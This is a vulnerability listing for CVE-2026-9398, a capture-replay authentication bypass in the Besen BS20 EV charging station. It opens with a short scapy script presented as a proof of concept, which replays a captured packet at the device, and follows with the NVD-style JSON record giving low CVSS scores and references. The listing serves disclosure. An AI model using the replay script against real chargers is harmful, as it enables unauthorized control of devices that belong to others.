CVE-2026-9398

import time import scapy.all as scapy # Conceptual Proof of Concept for Replay Attack against CVE-2026-9398 # This script demonstrates how a captured packet could be re-injected. # Target: Besen BS20 EV Charging Station (BLE/WiFi Component) def replay_attack(interface, packet_file): """ Reads a packet from a file and replays it on the specified interface. """ try: # Load the captured packet (e.g., authentication or command packet) packets = scapy.rdpcap(packet_file) if not packets: print("[-] No packets found in file.") return target_packet = packets[0] # Assume the first packet is the exploit payload print(f"[*] Loading packet from {packet_file}") print(f"[*] Target Interface: {interface}") print("[*] Waiting for vulnerable window...") time.sleep(2) # Replay the packet print("[*] Sending replay packet...") scapy.sendp(target_packet, iface=interface, verbose=0, count=1) print("[+] Exploit packet sent successfully.") print("[+] Check if the device command was executed without authentication.") except Exception as e: print(f"[-] An error occurred: {e}") # Example Usage: # replay_attack('wlan0', 'besen_auth_capture.pcap')

{"cve": {"id": "CVE-2026-9398", "sourceIdentifier": "[email protected]", "published": "2026-05-24T21:16:32.923", "lastModified": "2026-05-24T21:16:32.923", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in Besen BS20 EV Charging Station up to 20260426. This affects an unknown part of the component BLE/WiFi. Such manipulation leads to authentication bypass by capture-replay. The attack must be carried out from within the local network. Attacks of this nature are highly complex. It is indicated that the exploitability is difficult. The original disclosure mentions, that \"[t]hese vulnerabilities have been reported to Besen and we have received their acknowlegement that they are reviewing this as of April 2026.\""}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.3, "baseSeverity": "LOW", "attackVector": "ADJACENT", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 3.1, "baseSeverity": "LOW", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:A/AC:H/Au:N/C:N/I:P/A:N", "baseScore": 1.8, "accessVector": "ADJACENT_NETWORK", "accessComplexity": "HIGH", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "LOW", "exploitabilityScore": 3.2, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-287"}, {"lang": "en", "value": "CWE-294"}]}], "references": [{"url": "https://github.com/carfeii/besen#finding-5-unauthorized-tampering-of-charger-commands", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/813577", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/365379", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/365379/cti", "source": "[email protected]"}]}}